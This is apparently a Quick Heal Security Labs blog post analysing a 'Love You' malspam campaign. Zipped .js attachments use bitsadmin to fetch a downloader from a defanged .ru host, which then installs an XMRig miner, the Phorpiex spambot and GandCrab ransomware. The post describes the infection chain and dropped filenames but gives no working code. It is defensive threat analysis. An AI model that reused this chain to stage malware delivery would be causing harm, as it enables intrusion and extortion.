Malspam email or malicious spam emails are considered to be one of the favorite malware delivery channels for the attackers to deliver the malware to targeted victims. Attackers also run spam email campaigns to distribute their malware to a large number of users.
For attackers to succeed, two things are important – first is to get through the installed security product’s spam email filters and secondly, the attachment should be opened by the user. To accomplish the second task, attackers use different tactics to make their malicious email look as attractive or legitimate as possible in order to trick users into opening such attachments.
In earlier incidents, such spam campaigns were observed delivering the Monero (XMRig) cryptocurrency miner, Phorpiex spambot and Gandcrab ransomware through zipped ‘.js’ attachments having names which start with “Love_You_”.
How these attacks happen
Let us have a look at the below attack chain which depicts the execution sequence observed in this attack.
Fig: 1 Attack chain
The targeted victim will receive an email with subject name such as “Just for You” or “Love You”. Email contains attachments having names that start with “Love_You_”.
Fig 2: Email with zip attachment.
In the above screenshot, the attached zip file contains js file having the same name as the zip file.
As shown in fig. 3 The highlighted command which downloads the initial exe file with random_number as the name of the file through a bitsadmin command from the malicious link “hxxp://slpsrgpsrhojifdij.ru” and drops the downloaded file at %temp%.
This random_number.exe drops a copy of itself at “C:\Windows” with name “winsvcs.exe” which further acts as a malware downloader and downloads the exe files at %temp% as shown in the highlight below in the Wireshark traffic snippet.
Fig 4: Malware downloader downloads exe files.
Dropped Random_number.exe file performs Monero (XMRig) cryptocurrency miner activity. Below fig. shows traffic for Monero (XMRig) cryptocurrency miner.
Fig 5: Traffic for Monero (XMRig) cryptocurrency miner
Again it drops random_number.exe file at %temp% which is responsible for Phorpiex spambot malware. This Random_number.exe drops “wincfg32svc.exe” at “C:\Windows” location. “wincfg32svc.exe” file tries to send spam emails from the infected host as shown in the below procmon snapshot.
Fig 6: Phorpiex spambot send spam mail from infected host.
Malware downloader then drops another random_number.exe which is a payload for Gandcrab V5.0.4 at %temp% which starts encryption activity on the victim’s computer with AES encryption, and appends ‘. random letters’ extension to encrypted files.
We found that it encrypts only NON-PE files from the victim’s machine. It drops the below ransom note:
Fig 7: Ransom note
Fig 8: Encrypted file pattern
Quick Heal proactively protects its users from this threat:
Fig 9: Email protection.
Fig 10: Behavior Detection
Fig.11: Anti Ransomware
How to stay safe from ransomware attacks
Indicators of compromise: (SHA256)
Monero (XMRig) cryptocurrency miner:
Subject Matter Experts:
Priyanka Dhasade, Manish Patil | Quick Heal Security Labs
Thank you, Shriram, for in detail explanation of this new kind of virus and making us aware of it. This is definitely very helping for people from IT and Non-IT background. And especially I loved it the way you have explained.
Thank you, Kanishk.
We’re glad that you found it helpful.